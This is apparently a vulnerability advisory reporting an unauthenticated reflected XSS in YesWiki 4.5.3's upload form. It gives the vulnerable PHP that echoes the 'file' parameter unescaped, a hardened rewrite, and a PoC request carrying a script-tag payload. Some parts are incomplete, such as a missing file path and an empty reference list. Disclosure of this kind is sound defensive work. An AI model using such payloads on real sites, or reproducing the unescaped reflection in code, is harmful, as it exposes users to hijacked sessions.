Summary
Reflected XSS has been detected in the file upload form. The vulnerability can be exploited without authentication.
This Proof of Concept has been performed using the following:
- YesWiki v4.5.3 (doryphore-dev branch)
- Docker environment (docker/docker-compose.yml)
Vulnerable code
The vulnerability is located in the file
public function showUploadForm()
{
    // Source: the file name is taken straight from the query string with no validation
    $this->file = $_GET['file'];
    // Sink 1: reflected unescaped inside the <h3> element
    echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n";
    echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n"
        . ' <input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n"
        . ' <input type="hidden" name="MAX_FILE_SIZE" value="' . $this->attachConfig['max_file_size'] . "\" />\n"
        // Sink 2: the same value is interpolated unescaped into a hidden input's value attribute
        . " <input type=\"hidden\" name=\"file\" value=\"$this->file\" />\n"
        . " <input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
        . ' <input class="btn btn-primary" type="submit" value="' . _t('ATTACH_SAVE') . "\" />\n"
        . "</form>\n";
}
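As an added example that is not YesWiki's own code, the same form rebuilt so that the file parameter is validated before use and HTML-encoded at every point where it is reflected. The whitelist rule, the helper names h(), validateAttachmentName() and renderUploadForm(), and the constructed sample inputs are this example's assumptions; the translated labels and page tag are passed in as plain strings instead of going through _t() and $this->wiki.

```php
<?php
// Added example, not YesWiki's code: a hardened rendering of the upload form.
declare(strict_types=1);

/** Encode a value for insertion into HTML text or a double-quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Whitelist rule (this example's choice): a bare file name of letters, digits,
 * dot, dash, underscore and space, starting with a letter or digit. Anything
 * else (angle brackets, quotes, slashes, NUL, empty) is rejected, so output
 * encoding becomes a second layer rather than the only one.
 */
function validateAttachmentName(?string $name): ?string
{
    if ($name === null || $name === '') {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._ -]{0,254}$/', $name)) {
        return null;
    }
    return $name;
}

/** Build the form markup; every untrusted or dynamic value passes through h(). */
function renderUploadForm(
    string $file,
    string $formAction,
    string $pageTag,
    int $maxFileSize,
    string $title,
    string $saveLabel
): string {
    return '<h3>' . h($title) . ' ' . h($file) . "</h3>\n"
        . '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . h($formAction) . "\">\n"
        . ' <input type="hidden" name="wiki" value="' . h($pageTag) . "/upload\" />\n"
        . ' <input type="hidden" name="MAX_FILE_SIZE" value="' . $maxFileSize . "\" />\n"
        . ' <input type="hidden" name="file" value="' . h($file) . "\" />\n"
        . " <input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
        . ' <input class="btn btn-primary" type="submit" value="' . h($saveLabel) . "\" />\n"
        . "</form>\n";
}

/** Process one request value the way the controller would (returns HTML or an error line). */
function handleUploadFormRequest(?string $requestedFile): string
{
    $file = validateAttachmentName($requestedFile);
    if ($file === null) {
        return "400 Bad Request: invalid file name\n";
    }
    return renderUploadForm($file, '/?PagePrincipale/upload', 'PagePrincipale', 10485760, 'Upload form for file', 'Save');
}

// Constructed inputs: a legitimate name and the payload from the PoC request above.
$samples = [
    'report.pdf',
    '<script>alert(document.domain)</script>',
];
foreach ($samples as $requested) {
    echo "--- file=" . $requested . "\n";
    echo handleUploadFormRequest($requested);
}
```

Run with `php hardened_upload_form.php`: the first sample renders the form with the name inside the heading and the hidden field, the second is rejected at validation. Even if the whitelist were loosened later, h() guarantees that angle brackets and quotes reach the browser as entities rather than markup.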
PoC
- Send a request to the upload endpoint abusing the file parameter; client-side JavaScript execution is obtained
GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: localhost:8085
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
- Get a response

Impact
This vulnerability allows any unauthenticated malicious user to craft a link that, when clicked by a victim, performs arbitrary actions in the victim's context.
References